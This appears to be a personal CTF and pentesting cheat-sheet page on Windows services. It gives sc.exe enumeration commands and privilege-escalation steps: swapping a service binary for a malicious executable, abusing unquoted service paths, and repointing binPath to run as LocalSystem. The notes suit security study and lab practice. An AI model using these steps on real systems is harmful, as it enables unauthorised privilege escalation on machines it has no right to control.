Windows services

windowsprivesc20 steelmountain

You can learn more about Windows services here.

  • πŸ—ΊοΈ List services
PS> Get-Service
PS> net start
PS> sc.exe query # with infos
  • πŸ”Ž Get more info about a service
PS> sc.exe qc xxx
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: xxx
  [...]
  BINARY_PATH_NAME   : C:\[...]\service.exe
  [...]

πŸ”₯ In CTFs, you may be able to start/stop the service manually

PS> sc.exe stop xxx
PS> # do your job
PS> sc.exe start xxx

πŸ€ Notable services: vss, Spooler, wuauserv, etc.

➑️ See also: Potatoes πŸ₯” and SweetPotato (1.2k ⭐).

➑️ PrintNightmare (CVE-2021-1675) vulnerability in Spooler service.

➑️ Users in group Server Operators can start/stop some services. They can also edit some services, such as to replace the binary path.

Pentester Notes ☠️

Insecure permissions

The current user may be able to replace the service with a malicious executable (ex: revshell.exe)

PS> icacls C:\[...]\service.exe
PS> move C:\[...]\service.exe C:\[...]\service.exe.old
PS> icacls C:\[...]\malicious.exe /grant Everyone:F

Unquoted Service Path

If the service is using a PATH in which there are spaces, the service isn't quoted, and the hacker can create files, then the hacker may create an executable that is executed with the rest of the path in argument.

PS> icacls $Env:appdata\Vulnerable Program\service.exe
PS> move C:\[...]\malicious.exe $Env:appdata\Vulnerable.exe
PS> # the service will execute
PS> # $Env:appdata\Vulnerable.exe Program\service.exe

Insecure Service Permissions

return

It occurs if we can edit the permissions of a service, such as being able to change the location of the binary. Use the accesschk command. If the user is granted SERVICE_ALL_ACCESS on the service, then have fun.

PS> # LocalSystem is the highest privileged account available
PS> sc.exe config xxx binPath=C:\[...]\malicious.exe  obj= LocalSystem

πŸ‘» To-do πŸ‘»

Stuff that I found, but never read/used yet.

  • It's recommended to use service accounts for services.
  • Most services run with LocalSystem privileges by default
  • From the SCM, we can configure an application to be executed if a service fails. If one was configured, it can be exploited.